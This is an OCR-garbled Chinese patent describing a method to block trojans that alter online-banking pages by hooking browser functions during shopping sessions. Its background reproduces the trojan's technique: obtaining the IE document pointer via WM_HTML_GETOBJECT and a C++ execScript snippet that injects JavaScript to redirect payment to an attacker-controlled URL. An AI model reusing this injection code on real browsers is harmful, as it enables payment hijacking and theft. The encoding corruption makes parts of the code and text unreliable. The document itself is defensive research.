專利名稱:一種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的方法及裝置的制作方法
技術(shù)領(lǐng)域:
本發(fā)明涉及計(jì)算機(jī)技術(shù)領(lǐng)域�����,尤其涉及ー種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的方法及裝置�。
背景技術(shù):
隨著電子商務(wù)的發(fā)展,網(wǎng)上購物也越來越普及���,火熱的網(wǎng)購促銷活動(dòng)吸引了大量消費(fèi)者下單�,但各種惡意程序��,例如病毒木馬卻時(shí)刻威脅著網(wǎng)民的購物安全���,例如�,ー種名為“網(wǎng)銀大盜”的網(wǎng)購木馬及其變種,利用某知名播放器組件加載木馬��,由正常軟件作為木馬加載器和保護(hù)傘����,從而導(dǎo)致絕大多數(shù)殺毒軟件攔截失效。該木馬運(yùn)行后���,會(huì)偷偷篡改網(wǎng)上支付金額和收款賬戶��,把受害者的網(wǎng)銀資金劫持到黑客賬戶中。
買家在促銷活動(dòng)中容易放松警惕�����,如果點(diǎn)擊運(yùn)行了“網(wǎng)銀大盜”�����,購物支付頁面就會(huì)被木馬篡改��。與早期的網(wǎng)購木馬不同����,“網(wǎng)銀大盜”不僅劫持支付資金流向��,還會(huì)數(shù)百倍放大支付金額���,使網(wǎng)民蒙受更慘重的經(jīng)濟(jì)損失。由此可見����,如何提供一種針對(duì)修改網(wǎng)頁元素的木馬進(jìn)行攔截的機(jī)制,已經(jīng)成為業(yè)界亟待解決的問題��。
發(fā)明內(nèi)容
本發(fā)明所要解決的技術(shù)問題在于提供ー種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的方法及裝置���,已對(duì)各種新型的網(wǎng)購惡意程序進(jìn)行攔截����,保障網(wǎng)民的資金安全�。為解決上述技術(shù)問題,本發(fā)明提供ー種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的方法��,包括如下步驟偵測(cè)到客戶端瀏覽器啟動(dòng)后�,在預(yù)設(shè)的瀏覽器模塊中對(duì)預(yù)設(shè)函數(shù)的調(diào)用進(jìn)行監(jiān)控;偵測(cè)到客戶端瀏覽器打開預(yù)設(shè)網(wǎng)站的網(wǎng)頁時(shí)�����,根據(jù)預(yù)設(shè)策略,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用����,直至該網(wǎng)頁被關(guān)閉。本發(fā)明還ー種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的裝置�,包括監(jiān)控模塊,用于在偵測(cè)到客戶端瀏覽器啟動(dòng)后�,在預(yù)設(shè)的瀏覽器模塊中對(duì)預(yù)設(shè)函數(shù)的調(diào)用進(jìn)行監(jiān)控;攔截模塊�,用于在偵測(cè)到客戶端瀏覽器打開預(yù)設(shè)網(wǎng)站的網(wǎng)頁時(shí),根據(jù)預(yù)設(shè)策略��,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用�����,直至該網(wǎng)頁被關(guān)閉�����。應(yīng)用本申請(qǐng)的實(shí)施例��,可在源頭上防止惡意程序獲取操作網(wǎng)頁元素的指針��,避免木馬對(duì)網(wǎng)頁元素的篡改����,為網(wǎng)民提供了安全的網(wǎng)購環(huán)境。
為了更清楚地說明本發(fā)明實(shí)施例的技術(shù)方案����,下面將對(duì)實(shí)施例描述中所需要使用的附圖作簡(jiǎn)單地介紹,顯而易見地����,下面描述中的附圖僅僅是本發(fā)明的一些實(shí)施例,對(duì)于本領(lǐng)域普通技術(shù)人員來講��,在不付出創(chuàng)造性勞動(dòng)的前提下���,還可以根據(jù)這些附圖獲得其他的附圖�����。圖I為根據(jù)本發(fā)明的實(shí)施例所示的對(duì)修改網(wǎng)頁元素的木馬進(jìn)行攔截的方法流程示意圖����。圖2為根據(jù)本發(fā)明的實(shí)施例所示的對(duì)修改網(wǎng)頁元素的木馬進(jìn)行攔截的裝置結(jié)構(gòu)示意圖��。
具體實(shí)施例方式下面將結(jié)合本發(fā)明實(shí)施例中的附圖,對(duì)本發(fā)明實(shí)施例中的技術(shù)方案進(jìn)行清楚��、完整地描述�����,顯然��,所描述的實(shí)施例僅僅是本發(fā)明一部分實(shí)施例���,而不是全部的實(shí)施例����?��;诒景l(fā)明中的實(shí)施例�,本領(lǐng)域普通技術(shù)人員在沒有做出創(chuàng)造性勞動(dòng)前提下所獲得的所有其他實(shí)施例��,都屬于本發(fā)明保護(hù)的范圍�。為了便于理解本申請(qǐng)技術(shù)方案的攔截原理��,本說明書以木馬為例�����,先描述ー下此類網(wǎng)購惡意程序盜取財(cái)產(chǎn)的方式I、在啟動(dòng)后�,會(huì)循環(huán)執(zhí)行,F(xiàn)indWindow查找IE窗ロ�,向其發(fā)送WM_HTML_GETOBJECT得到對(duì)應(yīng)的CDOC指針;2�����、通過該指針在網(wǎng)頁中嵌入自己定制的JS腳本����,來獲取網(wǎng)銀頁面內(nèi)容,進(jìn)行跳轉(zhuǎn)
篡改�����;例如��,當(dāng)用戶訪問“中國(guó)エ商銀行”網(wǎng)頁時(shí)����,木馬會(huì)動(dòng)態(tài)獲取此時(shí)的網(wǎng)頁源碼,查找其中的RMB (即充值金額)等信息����,拼接出跳向自己充值賬戶網(wǎng)址的JS腳本" document, write�����、" <,script>window. location, href = ' http://abank.corsgate. com money = lOO&bank = ICBC&user = ' �����;</script)A ノ 〃 通過以下代碼執(zhí)行JS:if (pDocument)
{
CComQIPtr <IHTMLWindow2> pHTMLWnd; pDocument-〉get_parentWindow( &pHTMLWnd );
if ( pHTMLWnd != NULL )
{
CComBSTR bstrjs = strjs.AllocSysStringQ;
CComBSTR bstrlan = SysAllocString(L "javascript");VARIANT varRet;
pHTMLWnd-〉execScript(bstrjs, bstrlan, &varRet);
}
}3��、執(zhí)行完木馬的JS后網(wǎng)頁會(huì)發(fā)生跳轉(zhuǎn)��,經(jīng)過3次如下跳轉(zhuǎn)�,速度很快http://abank. corsgate. com/ebanK3. asphttp://interface2.game2.cn/ view = pay formhttps://www. yeepay. com/app-merchant-proxy/createOrder. action在3次跳轉(zhuǎn)過程中��,木馬會(huì)監(jiān)控這3個(gè)網(wǎng)址�,繼續(xù)插入JS動(dòng)態(tài)修改,導(dǎo)致最終又回到中國(guó)エ商銀行的交易界面���。此時(shí)充值帳號(hào)已經(jīng)變?yōu)槟抉R作者的帳號(hào)�,充值金額也隨機(jī)發(fā)生變化��。但呈現(xiàn)給用戶的界面是無法察覺到的�����。通過深入細(xì)致的研究�����,本申請(qǐng)的發(fā)明人發(fā)現(xiàn)所有的網(wǎng)購木馬要想篡改IE內(nèi)核瀏覽器的頁面元素�����,必須首先通過ー個(gè)特定的函數(shù)來遠(yuǎn)程獲取操作IE瀏覽器的指針�����,有了該指針���,就像得到了一把萬能鑰匙�����,可隨意操作網(wǎng)頁的一切信息����,從而更改支付賬戶���、支付金額的手段變得多種多樣��,輕而易舉����。只要不讓木馬獲得這把萬能鑰匙,就可以讓這種木馬失效���。為此�����,本發(fā)明實(shí)施例首先提供ー種對(duì)修改網(wǎng)頁元素的木馬進(jìn)行攔截的方法����,如圖I所示����,首先,在偵測(cè)到客戶端瀏覽器啟動(dòng)后��,在預(yù)設(shè)的瀏覽器模塊中對(duì)預(yù)設(shè)函數(shù)的調(diào)用進(jìn)行監(jiān)控(步驟101);然后�,偵測(cè)到客戶端瀏覽器打開預(yù)設(shè)網(wǎng)站的網(wǎng)頁時(shí),根據(jù)預(yù)設(shè)策略��,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用,直至該網(wǎng)頁被關(guān)閉(步驟102)�����。在檢測(cè)到該網(wǎng)頁被關(guān)閉后���,即可認(rèn)為用戶退出了網(wǎng)購模式,這時(shí)�,就可以恢復(fù)到正常的監(jiān)控等級(jí),只對(duì)特定函數(shù)的調(diào)用進(jìn)行監(jiān)控而不是拒絕�。其中,所述預(yù)設(shè)的瀏覽器模塊可以包括Safemon. dll�����。所述預(yù)設(shè)函數(shù)可以是包括進(jìn)程間windows消息通信過程中轉(zhuǎn)換消息對(duì)象的函數(shù)����,例如 OLEACC ! LresultFromObject 函數(shù)。所述預(yù)設(shè)策略�����,可以包括對(duì)被監(jiān)控的函數(shù)調(diào)用進(jìn)行分析���,當(dāng)該函數(shù)的參數(shù)符合預(yù)設(shè)消息類型時(shí)�����,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用�����。
所述預(yù)設(shè)消息類型�,可以包括IID_IHTMLDocument2。該函數(shù)的參數(shù)ー標(biāo)記著不同的消息類型�����,只有當(dāng)其符合IID_IHTMLD0Cument2消息類型時(shí)�,才進(jìn)行拒絕,因?yàn)镮ID_IHTMLD0CUment2的消息類型表明其他進(jìn)程(可能是網(wǎng)購木馬)想通過給IE發(fā)送這個(gè)消息來獲取操作IE網(wǎng)頁元素的對(duì)象��,幾乎沒有正常程序會(huì)去執(zhí)行這樣的操作�。如此ー來,通過在IE內(nèi)核瀏覽器的核心模塊Safemon. dlI中攔截OLEACC !LresultFromObject函數(shù)(例如,通過對(duì)該函數(shù)進(jìn)行Inline Hook操作實(shí)現(xiàn)攔截過濾),當(dāng)用戶進(jìn)入網(wǎng)購模式時(shí)��,可杜絕任何程序?qū)υ摵瘮?shù)的調(diào)用��,即從源頭上防止了木馬獲取操作網(wǎng)頁元素的指針。而且�����,根據(jù)本申請(qǐng)的實(shí)施例���,在瀏覽器啟動(dòng)后即會(huì)對(duì)預(yù)設(shè)函數(shù)進(jìn)行監(jiān)控��,但此時(shí)尚未進(jìn)行攔截,而當(dāng)瀏覽器進(jìn)入網(wǎng)購模式(即打開了預(yù)設(shè)網(wǎng)站��,也就是說輸入的網(wǎng)絡(luò)地址與預(yù)設(shè)列表中的地址一致)時(shí)進(jìn)行攔截���,響應(yīng)速度快�����,保障了用戶體驗(yàn)���。 OLEACC ! LresultFromOb ject函數(shù)是進(jìn)程間windows消息通信過程中轉(zhuǎn)換消息對(duì)象的ー類函數(shù),本申請(qǐng)的實(shí)施例僅以此為例進(jìn)行說明�����,不排除Windows將來升級(jí)后引入的其他此類函數(shù)。同理,IE內(nèi)核瀏覽器的核心模塊Safemon. dll也是當(dāng)前技術(shù)版本下的實(shí)例之一�����,不排除將來會(huì)引入其他包含有該類函數(shù)的模塊��。此外�,還可以針對(duì)其他特定函數(shù)設(shè)置攔截點(diǎn),例如�,所述預(yù)設(shè)函數(shù)還可以包括以下函數(shù)中的一種或多種CBase: :put_String, CIput: :put_value, get_Document、Navigate,Navigate2����,由于這些函數(shù)可以操作網(wǎng)頁的頁面元素,例如對(duì)網(wǎng)頁元素進(jìn)行寫入等操作�����,因此需要攔截這些函數(shù)���,可以避免用戶的網(wǎng)銀頁面被惡意程序篡改�����。而所述預(yù)設(shè)策略還可以包括拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的遠(yuǎn)程過程調(diào)用��。對(duì)于普通的網(wǎng)購木馬�����,IE通過 safemon. dll Inline Hook CBase: :put_String,,當(dāng)進(jìn)入網(wǎng)購模式(即瀏覽器訪問某些特定的購物網(wǎng)站的網(wǎng)頁時(shí))時(shí)拒絕遠(yuǎn)程過程調(diào)用(RPC調(diào)用���,是操作系統(tǒng)用于進(jìn)程間通信的一種機(jī)制)�,可攔截絕大部分通過RPC方式修改網(wǎng)頁元素的木馬��。例如,通過以下方式的調(diào)用來修改網(wǎng)頁最終都經(jīng)過mshtml ! CBase: :put_Stringmshtml ! CInput::s_apfnpdIHTMLInputElement函數(shù)虛表中的9號(hào)put_valuemshtml ! CFormElement: : s_apfnpdIHTMLFormElement函數(shù)虛表中的7號(hào)put_action...而在IE9下還可以增加一個(gè)攔截點(diǎn)Inline Hook CIput: :put_value,當(dāng)進(jìn)入網(wǎng)購模式時(shí)���,拒絕RPC調(diào)用;此外��,還可以包括對(duì)get_Document����、Navigate、Navigate2這些函數(shù)的攔截防護(hù)��。如此����,即可進(jìn)ー步攔截木馬對(duì)網(wǎng)頁元素的篡改。相對(duì)應(yīng)的,本申請(qǐng)還提供ー種對(duì)修改網(wǎng)頁元素的木馬進(jìn)行攔截的裝置���,請(qǐng)參考圖2����,包括監(jiān)控模塊201及攔截模塊202�,其中監(jiān)控模塊201,用于在偵測(cè)到客戶端瀏覽器啟動(dòng)后���,在預(yù)設(shè)的瀏覽器模塊中對(duì)預(yù)設(shè)函數(shù)的調(diào)用進(jìn)行監(jiān)控����;
攔截模塊202���,用于在偵測(cè)到客戶端瀏覽器打開預(yù)設(shè)網(wǎng)站的網(wǎng)頁時(shí)�����,根據(jù)預(yù)設(shè)策略�,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用��,直至該網(wǎng)頁被關(guān)閉�����。其中,所述預(yù)設(shè)的瀏覽器模塊可以包括Safemon. dll�。所述預(yù)設(shè)函數(shù)可以包括進(jìn)程間windows消息通信過程中轉(zhuǎn)換消息對(duì)象的函數(shù)。所述預(yù)設(shè)函數(shù)可以包括OLEACC ! LresultFromObject函數(shù)�。所述攔截模塊202執(zhí)行的預(yù)設(shè)策略,可以包括對(duì)被監(jiān)控的函數(shù)調(diào)用進(jìn)行分析�,當(dāng)該函數(shù)的參數(shù)符合預(yù)設(shè)消息類型時(shí),拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用���。所述預(yù)設(shè)消息類型可以包括IID_IHTMLDocument2����。所述預(yù)設(shè)函數(shù)可以包括以下函數(shù)中的ー種或多種CBase: :put_String, CIput::put_vaiue, get_Document���、Navigate, Navigate2�����。所述攔截模塊202執(zhí)行的預(yù)設(shè)策略,還可以包括拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的遠(yuǎn)程過程調(diào)用�����。上述裝置實(shí)施例的各部分運(yùn)作細(xì)節(jié)與有效效果,與上述方法實(shí)施例的相應(yīng)部分具有對(duì)應(yīng)關(guān)系��,在此不再贅述���。本說明書中的各個(gè)實(shí)施例均采用遞進(jìn)的方式描述�,每個(gè)實(shí)施例重點(diǎn)說明的都是與其他實(shí)施例的不同之處��,各個(gè)實(shí)施例之間相同相似的部分互相參見即可�����。本申請(qǐng)可以在由計(jì)算機(jī)執(zhí)行的計(jì)算機(jī)可執(zhí)行指令的一般上下文中描述��,例如程序模塊�。一般地,程序模塊包括執(zhí)行特定任務(wù)或?qū)崿F(xiàn)特定抽象數(shù)據(jù)類型的例程����、程序、對(duì)象����、組件、數(shù)據(jù)結(jié)構(gòu)等等�。也可以在分布式計(jì)算環(huán)境中實(shí)踐本申請(qǐng)��,在這些分布式計(jì)算環(huán)境中�����,由通過通信網(wǎng)絡(luò)而被連接的遠(yuǎn)程處理設(shè)備來執(zhí)行任務(wù)��。在分布式計(jì)算環(huán)境中��,程序模塊可以位于包括存儲(chǔ)設(shè)備在內(nèi)的本地和遠(yuǎn)程計(jì)算機(jī)存儲(chǔ)介質(zhì)中��。最后�,還需要說明的是�����,在本文中���,諸如第一和第二等之類的關(guān)系術(shù)語僅僅用來將一個(gè)實(shí)體或者操作與另ー個(gè)實(shí)體或操作區(qū)分開來�,而不一定要求或者暗示這些實(shí)體或操作之間存在任何這種實(shí)際的關(guān)系或者順序���。而且,術(shù)語“包括”�、“包含”或者其任何其他變體意在涵蓋非排他性的包含��,從而使得包括一系列要素的過程�����、方法���、商品或者設(shè)備不僅包括那些要素,而且還包括沒有明確列出的其他要素�����,或者是還包括為這種過程�、方法、商品或
者設(shè)備所固有的要素����。在沒有更多限制的情況下,由語句“包括ー個(gè)......”限定的要素��,
并不排除在包括所述要素的過程�、方法、商品或者設(shè)備中還存在另外的相同要素�����。以上對(duì)本申請(qǐng)進(jìn)行了詳細(xì)介紹,本文中應(yīng)用了具體個(gè)例對(duì)本申請(qǐng)的原理及實(shí)施方式進(jìn)行了闡述���,以上實(shí)施例的說明只是用于幫助理解本申請(qǐng)的方法及其核心思想����;同時(shí)��,對(duì)于本領(lǐng)域的一般技術(shù)人員�,依據(jù)本申請(qǐng)的思想,在具體實(shí)施方式
及應(yīng)用范圍上均會(huì)有改變之處���,綜上所述���,本說明書內(nèi)容不應(yīng)理解為對(duì)本申請(qǐng)的限制。
權(quán)利要求
1.一種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的方法����,其特征在于,包括如下步驟 偵測(cè)到客戶端瀏覽器啟動(dòng)后�����,在預(yù)設(shè)的瀏覽器模塊中對(duì)預(yù)設(shè)函數(shù)的調(diào)用進(jìn)行監(jiān)控; 偵測(cè)到客戶端瀏覽器打開預(yù)設(shè)網(wǎng)站的網(wǎng)頁時(shí)�����,根據(jù)預(yù)設(shè)策略�,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用��,直至該網(wǎng)頁被關(guān)閉�����。
2.如權(quán)利要求I所述的方法�����,其特征在于�����,所述預(yù)設(shè)的瀏覽器模塊包括Safemon.dll�����。
3.如權(quán)利要求I所述的方法����,其特征在于�,所述預(yù)設(shè)函數(shù)包括進(jìn)程間windows消息通信過程中轉(zhuǎn)換消息對(duì)象的函數(shù)��。
4.如權(quán)利要求I或3所述的方法��,其特征在于�����,所述預(yù)設(shè)函數(shù)包括OLEACC!LresultFromObject 函數(shù)�。
5.如權(quán)利要求I所述的方法,其特征在于�,所述預(yù)設(shè)策略,包括對(duì)被監(jiān)控的函數(shù)調(diào)用進(jìn)行分析����,當(dāng)該函數(shù)的參數(shù)符合預(yù)設(shè)消息類型時(shí),拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用�����。
6.如權(quán)利要求5所述的方法���,其特征在于�,所述預(yù)設(shè)消息類型包括IID_HTMLDocument20
7.如權(quán)利要求I所述的方法,其特征在于�����,所述預(yù)設(shè)函數(shù)包括以下函數(shù)中的一種或多種CBase::put_String, CIput::put_value, get_Document��、Navigate, Navigate2��。
8.如權(quán)利要求7所述的方法�,其特征在于���,所述預(yù)設(shè)策略包括拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的遠(yuǎn)程過程調(diào)用����。
9.一種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的裝置�,其特征在于,包括 監(jiān)控模塊���,用于在偵測(cè)到客戶端瀏覽器啟動(dòng)后���,在預(yù)設(shè)的瀏覽器模塊中對(duì)預(yù)設(shè)函數(shù)的調(diào)用進(jìn)行監(jiān)控; 攔截模塊�����,用于在偵測(cè)到客戶端瀏覽器打開預(yù)設(shè)網(wǎng)站的網(wǎng)頁時(shí),根據(jù)預(yù)設(shè)策略����,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用,直至該網(wǎng)頁被關(guān)閉���。
10.如權(quán)利要求9所述的裝置�,其特征在于�����,所述預(yù)設(shè)的瀏覽器模塊包括Safemon.dll�。
11.如權(quán)利要求9所述的裝置,其特征在于���,所述預(yù)設(shè)函數(shù)包括進(jìn)程間windows消息通信過程中轉(zhuǎn)換消息對(duì)象的函數(shù)����。
12.如權(quán)利要求9或11所述的裝置��,其特征在于��,所述預(yù)設(shè)函數(shù)包括OLEACC!LresultFromObject 函數(shù)。
13.如權(quán)利要求9所述的裝置�,其特征在于,所述攔截模塊執(zhí)行的預(yù)設(shè)策略�����,包括對(duì)被監(jiān)控的函數(shù)調(diào)用進(jìn)行分析����,當(dāng)該函數(shù)的參數(shù)符合預(yù)設(shè)消息類型時(shí)�,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用。
14.如權(quán)利要求13所述的裝置���,其特征在于�,所述預(yù)設(shè)消息類型包括IID_HTMLDocument20
15.如權(quán)利要求9所述的裝置���,其特征在于����,所述預(yù)設(shè)函數(shù)包括以下函數(shù)中的一種或多種CBase::put_String, CIput::put_value, get_Document�����、Navigate, Navigate2。
16.如權(quán)利要求15所述的裝置�����,其特征在于��,所述攔截模塊執(zhí)行的預(yù)設(shè)策略����,包括拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的遠(yuǎn)程過程調(diào)用。
全文摘要
本發(fā)明公開了一種對(duì)修改網(wǎng)頁元素的惡意程序進(jìn)行攔截的方法及裝置���,所述方法包括偵測(cè)到客戶端瀏覽器啟動(dòng)后����,在預(yù)設(shè)的瀏覽器模塊中對(duì)預(yù)設(shè)函數(shù)的調(diào)用進(jìn)行監(jiān)控��;然后偵測(cè)到客戶端瀏覽器打開預(yù)設(shè)網(wǎng)站的網(wǎng)頁時(shí)�����,根據(jù)預(yù)設(shè)策略����,拒絕任何程序?qū)λ霰槐O(jiān)控的預(yù)設(shè)函數(shù)的調(diào)用�����,直至該網(wǎng)頁被關(guān)閉���。應(yīng)用本申請(qǐng)的實(shí)施例,可在源頭上防止惡意程序獲取操作網(wǎng)頁元素的指針�,避免木馬對(duì)網(wǎng)頁元素的篡改,為網(wǎng)民提供了安全的網(wǎng)購環(huán)境����。
文檔編號(hào)G06F21/00GK102663289SQ201210078508
公開日2012年9月12日 申請(qǐng)日期2012年3月22日 優(yōu)先權(quán)日2012年3月22日
發(fā)明者向明, 寧敢, 肖銳, 肖鵬 申請(qǐng)人:奇智軟件(北京)有限公司